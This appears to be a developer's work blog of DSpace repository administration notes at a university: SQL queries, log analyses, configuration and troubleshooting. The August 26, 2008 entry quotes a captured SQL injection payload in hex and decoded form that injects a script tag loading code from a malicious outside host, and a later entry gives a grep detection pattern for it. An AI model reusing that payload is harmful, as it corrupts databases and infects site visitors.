Main

June 26, 2009

changing feedback email in dspace

The code for creating an email for feedback in dspace only allows 1 recipient: Email email = ConfigurationManager.getEmail("feedback"); email.addRecipient(ConfigurationManager.getProperty ("feedback.recipient")); While the email for admin allows a comma separated list of recipients: String AdminEmail = ConfigurationManager.getProperty("admin.emails"); String EmailsAddresses[] = AdminEmail.split(","); for (int i = 0; i < EmailsAddresses.length ; i++) { email.addRecipient(EmailsAddresses[i]); } I took parts of the admin code and applied it to the feedback part of dspace. Now feedback email supports a comma separated list of email recipients.

June 12, 2009

SQL to get number of new items in DSPACE after a certain date

select count(date_accessioned) from ItemsByDateAccessioned where date_accessioned > '2008-07-01'::DATE ;

June 2, 2009

Looking for non unicode characters in AgEcon metadata

Problem and general solution

Some non unicode characters have gotten into the dspace metadata. We need to find them. I will print out the meta data fields to an file of the form below. <doc> text from metadata pull </doc> Then I will run the file through xmllint.

sql needed

The line below will get all the valid item_ids.
SELECT item.item_id from item, handle where handle.resource_id=item.item_id;

The line below will pull a metadata field for a given item id.
select text_value from metadatavalue where metadata_field_id=43 AND item_id=36450;
For this query, the Series/Report will be obtained for an item with item_id=36450.

Metadata fields to check

metadata_field_id name
3 author
15 date issued
25 uri
27 abstract
40 Institution/Association
43 Series/Report
57 Keyword
63 JEL Codes
64 Title
67 email
This list came from AgEconMetadata.htm

May 24, 2009

Memory Leak in DSPACE

There is a memory leak in DSAPCE.
I have tried:
1) Making a more strict robots.txt file:

User-agent: *
Disallow: /browse-subject
Disallow: /browse-author
Disallow: /browse-title
Disallow: /browse-date
Disallow: /suggest
Disallow: /*/browse-subject
Disallow: /*/browse-author
Disallow: /*/browse-title
Disallow: /*/browse-date
Disallow: /image
Disallow: /feed
Disallow: /password-login
Disallow: /advanced-search

This change (especially the Disallow: /feed ) seems to have reduced cpu load, but the leak is still there.
2) A user group suggested shutting off the string cache. I tried this but it did not seem to help. 3) Also a site suggests that there is memory leak in tomcat 5.x. The site suggests that I upgrade to tomcat 6.x I haven't done this yet. 4) I will need to look in detail at output from hmap to determine where the trouble is. It is likely within the dspace app.

Install AgEcon on strip1

Install script for AgEcon on strip1

I wrote a shell script called deployAgEcon.sh. This has all the steps required to install a new version of AgEcon on strip1.

dspace.cfg config file

All information related to installing dspace on a given box is stored in the config file dspace.cfg. Below are versions for various boxes for both UDC and AgEcon: UDC on strip1
AgEcon on strip1
UDC on odin (silvi003 account)
AgEcon on odin (silvi003 account)

May 13, 2009

Eric Moore's Comments on the UDC Indexer

Eric Moore wrote a great explanation of the fields that are indexed in UDC.

May 8, 2009

New robots.txt file for dspace

I am going to use the robots.txt file below it is based on information from the dspace wiki User-agent: * Disallow: /browse-subject Disallow: /browse-author Disallow: /browse-title Disallow: /suggest Disallow: /*/browse-subject Disallow: /*/browse-author The "/suggest" corresponds to a page that sends an email to a friend.

March 9, 2009

sql for rollup stats in the dspace database

A) Find all the item handles that belong to a community with a community id of 4

SELECT handle.handle FROM community2item, handle WHERE community2item.item_id = handle.resource_id AND handle.resource_type_id = 2 AND community2item.community_id = 4

B) Turning a community handle into a resource id (community id)

SELECT handle.resource_id FROM handle WHERE handle=125 AND resource_type_id=4;

resource_id
-------------
4
Note: resource_type_id=4 means community.

C) Substitute B into A -> Item handles in terms of community handle

SELECT count (handle) FROM community2item, handle WHERE community2item.item_id = handle.resource_id AND handle.resource_type_id = 2 AND community2item.community_id = (SELECT handle.resource_id FROM handle WHERE handle=125 AND resource_type_id=4);

Note: resource_type_id=2 means item.

February 25, 2009

Dspace Handles collections with problems

Summary

In UDC there are Dspace Handles that are collections(resource_type_id =3) but do not show up in the collections table.

Finding the problem in the media filter log

I was looking at the filter media log, dspace-ir_filter-media.log, and found many errors of the form:

Exception in thread "main" java.lang.IllegalArgumentException: Cannot resolve 4394 to a DSpace object This means that when the handle was put into the static method HandleManger.resolveObject, a null resulted.

A list (handle set 1) of these handles was obtained using the UNIX command line below:

grep 'Cannot.resolve' dspace-ir_filter-media.log | perl -p -i -e 's/^.*Cannot resolve (\d+).*$/\1/g' | sort | uniq | sort -g

Look at handles that produce error inside of Postgres

One can go to the handle table and get the resource_id for one of the handles on the list. Using this resource_id, no entry can be found in the collection table. I think these are collections that were deleted. They were removed from the collection table but not from the handle table.

sql to get collection handles

old sql command ... pulls handles that have null and valid values in the collection table

The handles that were input to filter-media came from the sql cmd below:

SELECT handle FROM handle WHERE resource_type_id=3;

The above command will grab both good collection handles and handles that have no entry in the collection table.
Handles using this command (good and bad collection handles combined: handle set 2).

new sql command only pulls handles that have valid values in the collection table

The command below will only pull handles that have valid collection_ids (i.e. exist in the collection table).

SELECT handle FROM collection, handle WHERE collection_id=resource_id AND resource_type_id=3 ORDER BY handle::text::integer;

Handles using improved command handle set 3 (only handles that exist in the collection table).

Quick sanity check

handle set 1 maps to null collections.
handle set 2 maps to all collections in the handle table both null and non-null.
handle set 3 maps to non-null collections

So we would expect:
1) There to be no overlap between handle set 1 and handle set 3.
2) The combined contents of handle set 1 and handle set 3 should be equal to the contents of handle set 2.
Both 1 and 2 are correct.

February 13, 2009

java code in dspace to get collections an item belongs to

From Item.java we find: TableRowIterator tri = DatabaseManager.queryTabl(ourContext,"collection", "SELECT collection.* FROM collection, collection2item WHERE " + "collection2item.collection_id=collection.collection_id AND " + "collection2item.item_id= ? ", itemRow.getIntColumn("item_id"));

October 14, 2008

Test media filter ... DSPACE UDC side

This media should be filtered:

http://purl.umn.edu/5842

Keywords:

Austin Catholic November physician

October 9, 2008

Check that handle.resource_id=item.item_id

The command:
SELECT handle.* from item, handle where handle.resource_id=item.item_id and handle = 2204;
yields:
handle_id handle resource_type_id resource_id
5 2204 2 2
The command:
SELECT item.* from item, handle where handle.resource_id=item.item_id and handle = 2204;
yields:
item_id submitter_id in_archive withdrawn last_modified owning_collection
2 1 t f 2007-12-13 16:53:15.767-06 1
Finally the command:
select * from itemsbytitle where item_id=2;
yields:
items_by_title_id item_id title sort_title
3727 2 xponentially growing solutions for inverse problems in PDE xponentially growing solutions for inverse problems in pde


All of this implies that the URL:
https://odin.lib.umn.edu:9031/dspace-ir/handle/2204
Will resolve to a record with the title:
xponentially growing solutions for inverse problems in PDE
This is what happens.

October 4, 2008

part of regex to find sql attacks

| grep 'DECLARE.*CHAR.*SET.*CAST' |

sql cmd for dspace

Insert dspace type logs into the University of Minho stats addon

INSERT INTO stats.log (date, logger, priority, message) VALUES
('2008-09-19 11:45:22,672', 'org.dspace.app.webui.servlet.DSpaceServlet', 'INFO',
'anonymous:session_id=85E693CBBCBD74DB561B2D2DBEDD0E2B:ip_addr=128.101.29.84:
view_item:handle=2854');

Find the delta t for an item that has a handle 7113

select ('2008-03-07 21:44:01.797-06' - (select item.last_modified from item, handle where handle.resource_id=item.item_id and handle=7113));

Find handles that have been modified since epoch 1197586394

SELECT handle, EXTRACT(EPOCH FROM item.last_modified) from item, handle where handle.resource_id=item.item_id and EXTRACT(EPOCH FROM item.last_modified) > 1197586394 order by handle;

Bitstream from handle

select bundle2bitstream.bitstream_id from item2bundle, handle, bundle2bitstream where (handle.handle=31045 and handle.resource_id = item2bundle.item_id and bundle2bitstream.bundle_id=item2bundle.bundle_id);
bitstream_id
--------------
3976

handle from Bitstream

dspace_sr=> select handle.handle from item2bundle, handle, bundle2bitstream where (bundle2bitstream.bitstream_id=3976 and handle.resource_id = item2bundle.item_id and bundle2bitstream.bundle_id=item2bundle.bundle_id);
handle
--------
31045
(1 row)

Collections that are children of a given community

SELECT handle FROM community2collection, handle WHERE community2collection.collection_id = handle.resource_id AND handle.resource_type_id = 3 AND community2collection.community_id = (SELECT resource_id FROM handle WHERE resource_type_id=4 AND handle=1);

communities that are children of a given community

SELECT handle FROM community2community, handle WHERE community2community.child_comm_id = handle.resource_id AND handle.resource_type_id = 4 AND community2community.parent_comm_id = (SELECT resource_id FROM handle WHERE resource_type_id=4 AND handle=1);

some ips that wormly uses

We are using wormly to monitor our dspace instances. The apache logs give a few ips that wormly uses

apache_pattern_ip.pl -d -r '\"-\" \"\"' ageconsearch_access.log_2008-09-21
72.51.35.173 node-x2j54.wormly.com.
69.60.118.203 node-sp711.wormly.com.
125.214.66.62 node-aux9e3.wormly.com.
81.171.111.142 node4.wormly.com.
66.228.123.50 clover.wormly.com.
207.210.96.85 node3.wormly.com.


Note the perl script apache_pattern_ip.pl gives the ips of all the log entries that match the given regex.

September 30, 2008

Translating apache log format to dspace

Introduction

There are basically two types of log files that must be handled: views and downloads.

Downloads

Comparison of apache and dspace logs

From apache logs:
69.109.228.170 - - [21/Sep/2008:23:59:27 -0500] "GET /bitstream/31045/1/26020387.pdf HTTP/1.1" 200 1225483 "http://scholar.google.com/scholar?hl=en&lr=&q=accept+Genetically+modified+organism&btnG=Search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"

When the guts of this request is sent to agecon by entering the line below into a browser:

http://ageconsearch.umn.edu/bitstream/31045/1/26020387.pdf

Catalina records the following log entry:

2008-09-30 16:12:08,153 INFO org.dspace.app.webui.servlet.BitstreamServlet @ anonymous:session_id=F82A25EDFCF0C73AE8C19291D3C3985A:ip_addr=128.101.29.84:view_bitstream:bitstream_id=3976


Required conversions

Notice that in the two log entries above, apache records a handle of 31045, while the dspace log gives a bitstream_id of 3976. To convert from apache to dspace, we must map the handle to the bitstream_id. The sql command below will do this:

select bundle2bitstream.bitstream_id from item2bundle, handle, bundle2bitstream where (handle.handle=31045 and handle.resource_id = item2bundle.item_id and bundle2bitstream.bundle_id=item2bundle.bundle_id); bitstream_id
bundle_id
-----------
3976
Note the bundle_id and the bitstream_id are the same.

Views

Comparison of apache and dspace logs

For views we have an apache log of the form:

203.20.101.203 - - [21/Sep/2008:23:32:17 -0500] "GET /handle/22682 HTTP/1.1" 503 410 "http://scholar.google.com.au/scholar?q=%22some+implications+of+the+growth+of+the+mineral+sector%22&hl=en&um=1&ie=UTF-8&oi=scholart" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.1)"

When the request below is put into a browser:
http://ageconsearch.umn.edu/handle/22682

We get the catalina log:

2008-09-30 16:26:30,456 INFO org.dspace.app.webui.servlet.DSpaceServlet @ anonymous:session_id=F82A25EDFCF0C73AE8C19291D3C3985A:ip_addr=128.101.29.84:view_item:handle=22682

Required conversions

To generate the dspace log format, we need to determine what was being viewed. In the case above it was an view_item.
From the handle we can find the resource_type_id, which allows us to generate terms like, view_item.
select * from handle where handle=22682; handle_id | handle | resource_type_id | resource_id -----------+--------+------------------+------------- 13089 | 22682 | 2 | 12346
The table below provides a conversion between the resource_type_id and they actual type.
resource_type resource_type_id
BITSTREAM 0
BUNDLE 1
ITEM 2
COLLECTION 3
COMMUNITY 4
SITE 5
GROUP 6
EPERSON 7

September 24, 2008

Analysis of Apache/Catalina AgEcon Records for

Breakdown of log entries by type

I looked at the catalina.out log records for 2008-09-21. These logs are in the file: catalina.out_2008-09-21 (because of the way that the files are backed up the log entries only extend to 11:30 PM). From these entries, I made a list of log entries by type: BreakDownOfAgEconLog_2008_09_21.html It is worth noting that of the 62K hits only 20 came from "SimpleSearch". That is only 20 users went to our search engine and the rest searched through google or are robots.

Log types that are required for stats

Jason Roy and I agree that the following log types are need for stats.
Log Name Number in Log Found Apache Match Apache needs SQL
view_bitstream 10772 Y Y
view_item 4462 Y N
view_collection 2084 Y Y
view_community 582 Y Y
The "Apache needs SQL" column indicates whether it is required to use information from the dspace SQL database to map the apache logs to dspace catalina logs. Also the term "view_bitstream" corresponds to download.

How apache logs map to catalina logs

To take care of some issues in the catalina logs, I am going to use apache logs. Here are examples of the log entries for both apache and catalina for all of the critical log types given in the table above. There are also catalina examples for almost all the types.

September 17, 2008

Why UDC crashed ... "pool exhausted" error Jason, Basically DSPACE does not properly close connections to the SQL server. When the pool is exhausted it generates error messages. This may be more of a problem now because OAI is available (climbing down t

Jason,

Basically DSPACE does not properly close connections to the SQL server. When the pool is exhausted it generates error messages. This may be more of a problem now because OAI is available (climbing down the tree will hit the DB a lot) or there is another SQL-Injection attack, or UDC just may be more popular. I did not explore the probable increased load.

A more detailed explanation of the error is given below, with a possible fix. To step up the fix given on the web I need some privileges on strip3. I have asked CCO for them.

Jeff

1) Problem Indicated in the Logs

Starting at
2008-09-17 08:23:08,769
and ending at
2008-09-17 08:53:29,729 (When Bill restarted DSPACE).
There were 330 error messages of the type:
2008-09-17 08:53:29,729 WARN org.dspace.app.webui.servlet.DSpaceServlet @ anonymous:no_context:database_error:org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool exhausted


An error messages of this sort would generate an error screen.

2) Fix from University of Michigan

In dspace-tech the University of Michigan team addresses this problem by closing prossess that have the phrase 'idle in transaction' when displayed by ps.

see
http://www.mail-archive.com/dspace-tech@lists.sourceforge.net/msg01057.html

3) Confirmation that our problem matches University of Michigan's
I have checked strip3 (where the postgres database lives) and between 08:54 (When Bill restarted DSPACE) and 11:22, there have been 45 processes created that have the form:

postgres 15047 0.0 0.0 86304 4964 ? S 10:58 0:00 postgres: dspace_ir dspace_ir 134.84.135.19 idle

So we are building up these "idle" processes on the DB side and it is likely that the system will crash again, unless we put in the Michigan fix

September 16, 2008

Properties of tomcat and apache on strip1

Here are the properties:

Using CATALINA_BASE: /opt/tomcat
Using CATALINA_HOME: /opt/tomcat
Using CATALINA_TMPDIR: /opt/tomcat/temp
Using JRE_HOME: /opt/jdk1.5.0_10
Server version: Apache Tomcat/5.5.20
Server built: Sep 12 2006 10:09:20
Server number: 5.5.20.0
OS Name: Linux
OS Version: 2.6.9-78.0.1.ELsmp
Architecture: i386
JVM Version: 1.5.0_10-b03
JVM Vendor: Sun Microsystems Inc.



Server version: Apache/2.0.52
Server built: May 9 2008 05:54:40

mod_jk/1.2.25

September 11, 2008

Bad handle in AgEcon indexer

An AgEcon patron tried to submit a file to the archive. When they did a search based on author an error resulted. The AgEcon staff resubmitted and then deleted the old record. It looks like a bad handle got into the lucene index with the submit and then was never removed. When dspace queries lucene and finds a handle that is not in the DB it throws an error and halts the search. Perhaps it should continue on. Here is some error logs.

September 8, 2008

OAI on odin

Activating the OAI harvester

I have enabled the OAI harvester for the dspace instance on the odin box. I needed to make the oai_dc metadata available. To do this I copied the file:

~/dspace_home/config/templates/oaicat.properties
to
~/dspace_home/config/templates/oaicat.properties

and returned the contents of this file to its original form (i.e. revision 1). Note: in this default state the file oaicat.properties has the line:
Crosswalks.oai_dc=org.dspace.app.oai.OAIDCCrosswalk uncommented.
I also removed the replace task from the build.xml file in the dspace-sr instance. Although for several months the OAI harvestor has been operational, the changes mean that the dspace-ir (UDC) and the dspace-sr (AgEcon) invoke the OAI system in an identical fashion.

Hyperlinks to call OAI verbs

Hyperlinks to development server on odin

The URL below returned all the metadata:
https://odin.lib.umn.edu:9031/dspace-oai-ir/request?verb=ListRecords&metadataPrefix=oai_dc

This URL will return all the metadata since 2008-04-15:
https://odin.lib.umn.edu:9031/dspace-oai-ir/request?verb=ListRecords&metadataPrefix=oai_dc&from=2008-04-15

The next URL returns the data between 2008-04-15 and 2008-04-20
https://odin.lib.umn.edu:9031/dspace-oai-ir/request?verb=ListRecords&metadataPrefix=oai_dc&from=2008-04-15&until=2008-04-20

Hyperlinks to live box

AgEcon:
http://strip1.oit.umn.edu:8080/dspace_sr-oai/request?verb=ListRecords&metadataPrefix=oai_dc&from=2008-04-15&until=2008-04-30
UDC:
http://strip1.oit.umn.edu:8080/dspace_ir-oai/request?verb=ListRecords&metadataPrefix=oai_dc&from=2008-04-15&until=2008-04-30

Nice hyperlinks to live box

http://strip1.oit.umn.edu:8080/dspace_ir-oai/
has been aliased to
http://conservancy.umn.edu/oai

and
http://strip1.oit.umn.edu:8080/dspace_ir-oai/
has been aliased to
http://ageconsearch.umn.edu/oai/

These are much nicer to look at.

So the urls below will work.
http://conservancy.umn.edu/oai/request?verb=ListRecords&metadataPrefix=oai_dc&from=2008-04-15&until=2008-04-30
http://ageconsearch.umn.edu/oai/request?verb=ListRecords&metadataPrefix=oai_dc&from=2008-04-15&until=2008-04-30

Issues with OAI harvester on DSPACE

Elements in the AgEcon schema are not displayed

Only the AgEcon metadata that are Dublin Core are displayed by the OAI harvester
Note in the table from the link above:  
metadata_schema_id = 1 is dc schema
metadata_schema_id = 2 is agecon schema

The elements of the AgEcon schema are not displayed by the current crosswalk and a new crosswalk would have to be written.

Crosswalk is not qualified Dublin Core

The crosswalk from the dspace archive to the OAI output is Dublin Core not qualified Dublin Core (note the metadataPrefix=oai_dc in the OAI requests above).
So the values:
 date        | accessioned | Date DSpace takes possession of item.
 date        | available        | Date or date range item became available to the public.
 date        | issued    
  
are all mapped to the tag <dc:date> In this OAI output sample , I have pointed out which OAI <dc:date> tags correspond to the various qualified Dublin Core dates. I did an sql query on item 2 to find the actual values for the different date fields.
I could try to find a caned crosswalk for DSPACE to qualified DC. I have briefly looked for this several people say it would be a good thing but I have not found anyone who has done this. Hard to say how long this would take, but it is possible that no one has done it.

Update oaicat.jar

I did an update on oaicat.jar. It turns out that this both versions of the jar work, so I stayed with the more recent version. The manifests form both jars are given here.
oaiCatMainfest.html

August 26, 2008

SQL injection attacks on dspace

We have been getting a large number of SQL inject attacks. Below is the raw hex of these attacks and the ascii translations.
Raw hex: www.lib.umn.edu/libdata/page_print.phtml?page_id=1337'; DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x 4445434C415245204054207661726368617228323535292C4043207661 7263686172283430303029204445434C415245205461626C655F437572 736F7220435552534F5220464F522073656C65637420612E6E616D652C 622E6E616D652066726F6D207379736F626A6563747320612C73797363 6F6C756D6E73206220776865726520612E69643D622E696420616E6420 612E78747970653D27752720616E642028622E78747970653D3939206F 7220622E78747970653D3335206F7220622E78747970653D323331206F 7220622E78747970653D31363729204F50454E205461626C655F437572 736F72204645544348204E4558542046524F4D20205461626C655F4375 72736F7220494E544F2040542C4043205748494C452840404645544348 5F5354415455533D302920424547494E20657865632827757064617465 205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B 275D2B2727223E3C2F7469746C653E3C736372697074207372633D2268 7474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A 73223E3C2F7363726970743E3C212D2D272720776865726520272B4043 2B27206E6F! ASCII DECLARE @T varchar(255),@C va?rchar(4000) DECLARE Table_Cur?sor CURSOR FOR select a.name,?b.name from sysobjects a, sysc?olumns b where a.id=b.id and ?a.xtype='u' and (b.xtype=99 o?r b.xtype=35 or b.xtype=231 o?r b.xtype=167) OPEN Table_Cur?sor FETCH NEXT FROM Table_Cu?rsor INTO @T,@C WHILE(@@FETCH?_STATUS=0) BEGIN exec('update? ['+@T+'] set ['+@C+']=['+@C+?']+''"></title><script src= "h?ttp://sdo.1000mg.cn/csrss/w.j?s"></script><!--'' where '+@C?+' no

August 25, 2008

Small changes to UDC

I. Change a simple phrase

OLD: ./config/language-packs/Messages.properties:112:jsp.collection-home.submit.button =
OLD: Submit to This Collection
NEW:Submit another item

II. kill "Subscribe to this collection to receive daily e-mail notification of new additions" button

The file ./jsp/local/collection-home.jsp was edited to remove the button.
edits to collection-home.jsp

August 21, 2008

Exporting DSPACE repository to flat files

Exporting DSPACE repository to flat files
Export collection with handle: 33784
Export to the directory: /dspace/assetstore/ag_export/im/
Export to start at lowest member of collection : n=0

./dsrun org.dspace.app.itemexport.ItemExport -t COLLECTION -i 33784
-d /dspace/assetstore/ag_export/im/ -n 0

Subdirectories created
[silvi003@strip1 im]$ ls 0 13 18 22 27 31 36 40 45 5 54 59 63 68 72 77 81 86 90
1 14 19 23 28 32 37 41 46 50 55 6 64 69 73 78 82 87 91
10 15 2 24 29 33 38 42 47 51 56 60 65 7 74 79 83 88 92
11 16 20 25 3 34 39 43 48 52 57 61 66 70 75 8 84 89 93
12 17 21 26 30 35 4 44 49 53 58 62 67 71 76 80 85 9

Contents of the first subdirectory
[silvi003@strip1 im]$ ls 0
contents dublin_core.xml fo07he01.pdf handle
The Dublin Core in the first subdirectory

[silvi003@strip1 im]$ cat 0/dublin_core.xml
0/dublin_core.xml

July 28, 2008

Sending dspace email to a gmail accounts

email situation

Dspace sends me a large number of email messages. My real email gets lost in a forest of dspace messages. So I have need to find every instance where silvi003@umn.edu is used and replace it with an account that I set up: dspacedump@gmail.com
So I changed:

mail.admin = silvi003@umn.edu
alert.recipient = silvi003@umn.edu

to

mail.admin = dspacedump@gmail.com
alert.recipient = dspacedump@gmail.com

in
./config/dspace.cfg

July 17, 2008

media filter UDC and cron job

Cron job

My predecessor wrote a cron job to index the contents of the pdfs in UDC. It is:
#
# Filter media
#
1 0 * * * /dspace/dspace-ir/bin/filter-media.sh > /dspace/dspace-ir/log/filter-media.log 2>&1
It was noted that this process was taking up to eight hours to run and impacting the users.
It will need to be edited and replaced.

Error record associated with the cron job

Creating search index:
Applying Media Filters
2008-02-11 08:07:19,271 
  INFO  org.dspace.core.ConfigurationManager @ DSpace logging installed using log4j.properties
Exception in thread "main" java.lang.IllegalArgumentException: Cannot resolve 4938 to a DSpace object
        at org.dspace.app.mediafilter.MediaFilterManager.main(MediaFilterManager.java:192)
Applying Media Filters
2008-02-11 08:07:19,839 INFO  org.dspace.core.ConfigurationManager 
       @ DSpace logging installed using log4j.properties
2008-02-11 08:07:20,160 INFO  org.dspace.content.MetadataField 
       @ Loading MetadataField elements into cache.
2008-02-11 08:07:20,199 INFO  org.dspace.content.MetadataSchema @ Loading schema cache for fast finds
SKIPPED: bitstream 16263 because 'LIFE_SCIENCEs_PREDESIGN_REPORT041504_.pdf.txt' already exists
SKIPPED: bitstream 16261 because 'equine_predesign_may04.pdf.txt' already exists
SKIPPED: bitstream 16259 because 'EducationalFacilitiesPredesignStudyFinal.pdf.txt' already exists
ERROR filtering, skipping bitstream #16251 java.lang.ArrayIndexOutOfBoundsException: 4
java.lang.ArrayIndexOutOfBoundsException: 4
        at org.fontbox.cmap.CMapParser.parseNextToken(CMapParser.java:294)
        at org.fontbox.cmap.CMapParser.parse(CMapParser.java:103)
        at org.pdfbox.pdmodel.font.PDFont.parseCmap(PDFont.java:535)
        at org.pdfbox.pdmodel.font.PDFont.encode(PDFont.java:387)
        at org.pdfbox.util.PDFStreamEngine.showString(PDFStreamEngine.java:325)
        at org.pdfbox.util.operator.ShowTextGlyph.process(ShowTextGlyph.java:80)
        at org.pdfbox.util.PDFStreamEngine.processOperator(PDFStreamEngine.java:452)
        at org.pdfbox.util.PDFStreamEngine.processSubStream(PDFStreamEngine.java:215)
        at org.pdfbox.util.PDFStreamEngine.processStream(PDFStreamEngine.java:174)
        at org.pdfbox.util.PDFTextStripper.processPage(PDFTextStripper.java:336)
        at org.pdfbox.util.PDFTextStripper.processPages(PDFTextStripper.java:259)
        at org.pdfbox.util.PDFTextStripper.writeText(PDFTextStripper.java:216)
        at org.pdfbox.util.PDFTextStripper.getText(PDFTextStripper.java:149)
        at org.dspace.app.mediafilter.PDFFilter.getDestinationStream(PDFFilter.java:110)
        at org.dspace.app.mediafilter.MediaFilter.processBitstream(MediaFilter.java:155)
        at org.dspace.app.mediafilter.MediaFilterManager.filterBitstream(MediaFilterManager.java:327)
        at org.dspace.app.mediafilter.MediaFilterManager.filterItem(MediaFilterManager.java:296)
        at org.dspace.app.mediafilter.MediaFilterManager.applyFiltersItem(MediaFilterManager.java:266)
        at org.dspace.app.mediafilter.MediaFilterManager.applyFiltersCollection(MediaFilterManager.java:260)
        at org.dspace.app.mediafilter.MediaFilterManager.main(MediaFilterManager.java:202)
ERROR filtering, skipping bitstream #16250 java.lang.ArrayIndexOutOfBoundsException
java.lang.ArrayIndexOutOfBoundsException
SKIPPED: bitstream 16249 because 'Volume_II-Appendix2.pdf.txt' already exists
ERROR filtering, skipping bitstream #16248 java.lang.ArrayIndexOutOfBoundsException
java.lang.ArrayIndexOutOfBoundsException
SKIPPED: bitstream 15486 because 'AHC_FacilitiesMasterPlan.pdf.txt' already exists
SKIPPED: bitstream 13492 because 'Vet_med_facilities_development_plan_FINAL.pdf.txt' already exists
SKIPPED: bitstream 13490 because 'SPH_CONSOLIDATION.pdf.txt' already exists
SKIPPED: bitstream 13488 because 'AHC_strategic_facility_plan_1998.pdf.txt' already exists
SKIPPED: bitstream 13486 because 'AHC_Precinct_Plan_Report_Final_May_2006.pdf.txt' already exists
SKIPPED: bitstream 13484 because 'AHC_Mpls_District_Plan_2000.pdf.txt' already exists
Creating search index:
Creating browse index
Indexing all Items in DSpace....2008-02-11 08:17:24,358 
  INFO  org.dspace.core.ConfigurationManager @ DSpace logging installed using log4j.properties
2008-02-11 08:17:25,315 
   INFO  org.dspace.content.MetadataField @ Loading MetadataField elements into cache.
2008-02-11 08:17:25,357 
   INFO  org.dspace.content.MetadataSchema @ Loading schema cache for fast finds
 ... Done
Creating search index
2008-02-11 08:19:57,683 INFO  org.dspace.core.ConfigurationManager @ 
   DSpace logging installed using log4j.properties

Some basic information on Dspace

Possible ant tasks

ant compile
ant build_wars
ant update
ant install_code
ant init_configs
ant setup_database
ant clean_database
ant load_registries
ant fresh_install
ant clean
ant public_api
ant javadoc

Some important boxes

UDC sandbox
http://odin.lib.umn.edu:9040/dspace-ir/

We set up a virtual machine for strip one and two.
strip1vm.oit.umn.edu 160.94.138.139
strip3vm.oit.umn.edu 160.94.138.140

Miscellaneous

Version that we use: DSpace Version 1.4.1, 8-December-2006
Approximate size of the asset store: 73G
Server version: Apache/2.0.52
On strip1, the Library specific apache configs are kept in /opt/httpd/conf.d

June 20, 2008

Host Based Access on Postgres and DSPACE ... pg_hba.conf

The pg_hba.conf file controls remote access to postgres.
On strip 3 of our DSPACE instance there are two of these files:

/opt/pgsql/data/pg_hba.conf
/var/lib/pgsql/data/pg_hba.conf


/var/lib/pgsql/data/pg_hba.conf is the live one.

June 18, 2008

SQL select to get author handle data_issued and title from the postgres DB

select itemsbytitle.title , handle.handle, itemsbydate.date_issued , itemsbyauthor.author
from (( itemsbytitle
INNER JOIN handle ON itemsbytitle.item_id = handle. resource_id)
INNER JOIN itemsbydate ON itemsbydate.item_id = itemsbytitle.item_id)
INNER JOIN itemsbyauthor ON itemsbyauthor.item_id = itemsbytitle.item_id
where resource_id = 8137;

June 12, 2008

Information on Journal in AgEcon from Brad Teale

Hi Jeff, The Journal listing is created in the Community.java class under org/dspace/content. It is using the following SQL statement: SELECT DISTINCT(community.community_id), name, short_description, introductory_text, logo_bitstream_id, copyright_text, side_bar_text FROM community, community2item WHERE community2item.item_id IN (SELECT item_id FROM metadatavalue WHERE metadata_field_id=(SELECT metadata_field_id FROM metadatafieldregistry WHERE element='type' AND qualifier IS NULL) AND text_value IN ('Journal Article', 'Submitted Journal Article')) AND community.community_id=community2item.community_id ORDER BY (name) ASC; Basically, it is looking in the metadatafieldregistry table for element=type and an empty qualifier with a text_value of either: Journal Article or Submitted Journal Article. These were the terms defined during the initial requirements gathering of these pages. If something else is defined as a Journal type it does require a code change. It would be nice to move these text_value values into the configuration so changes don't require code modifications. Let me know if you have additional questions. Brad

May 28, 2008

AgEcon MetaData

Below is a list of all the metadata used by AgEcon. Note
metadata_schema_id = 1 refers to dc,
metadata_schema_id = 2 refers to agecon.
AgEconMetadata.html

May 23, 2008

AgEcon OAI URL

Naming OAI handler

I have enabled OAI on AgEcon Search. It can be reached at the URL:
http://strip1.oit.umn.edu:8080/dspace_sr-oai/request?verb=Identify


John Chapman gave me a list of common OAI sites:

http://gita.grainger.uiuc.edu/registry/ListAllRepos.asp


Of the URLs there I like the one below the best:

XML/XSD/XSL Registry (xmlregistry.oclc.org)
http://alcme.oclc.org/xmlregistry/OAIHandler?verb=Identify

It does not have an explicit IP or refer to specific technology, so it would b e easy to maintain as AgEcon migrates from box to box and from one technology to the next.

So based on that I plan on using:
http://ageconsearch.umn.edu/OAIHandler?verb=Identify

Changes in config files

The changes below were required to for oai to come to life:

File: ./config/dspace.cfg
config.template.oaicat.properties = ${dspace.dir}/config/oaicat.properties ... old
config.template.oaicat.properties = ${dspace.dir}/config/templates/oaicat.properties ... new

File: ./build.xml
./build.xml:281: <replace file="${dspace.dir}/config/templates/oaicat.properties"
./build.xml:285: <replace file="${dspace.dir}/config/templates/oaicat.properties"

File: ./etc/oai-web.xml
./etc/oai-web.xml:66: @@dspace.dir@@/config/templates/oaicat.properties

Test OAI handler

http://odin.lib.umn.edu:9030/dspace-oai/request

OAI jar information

[silvi003~/Documents/workspace/dspace-sr/lib]$ dumpManifest oaicat.jar Manifest-Version: 1.0 Ant-Version: Apache Ant 1.6.1 Created-By: 1.4.1_01-b01 (Sun Microsystems Inc.) Specification-Title: OAI-PMH Specification-Version: 2.0 Specification-Vendor: Open Archives Initiative Implementation-Title: OAICat Implementation-Version: 1.5.48 October 23 2006 Implementation-Vendor: OCLC, Online Computer Library Center Implementation-URL: http://www.oclc.org/research/software/oai/cat.shtm To get the jar go to: OCLC software

Info on OAI tools

OAIToolsFinal.pdf

April 22, 2008

Simple jsp form in dspace and jsp to read it

Jen made the jsp from below:

new-user_direct-email.jsp
I wrote the jsp below to catch the result:

mail_request_for_new_user.jsp
This is a simple chunk of code but I may reuse it.

March 27, 2008

odin ssl certificates

There have been some problems with the viewing of certain images in both UDC and AgEcon from the odin.lib.umn.edu. We believe this was dues to certificates that I made using the java tool. I replaced my certificate with one made by Brad.

March 12, 2008

Comment out UDC email updates

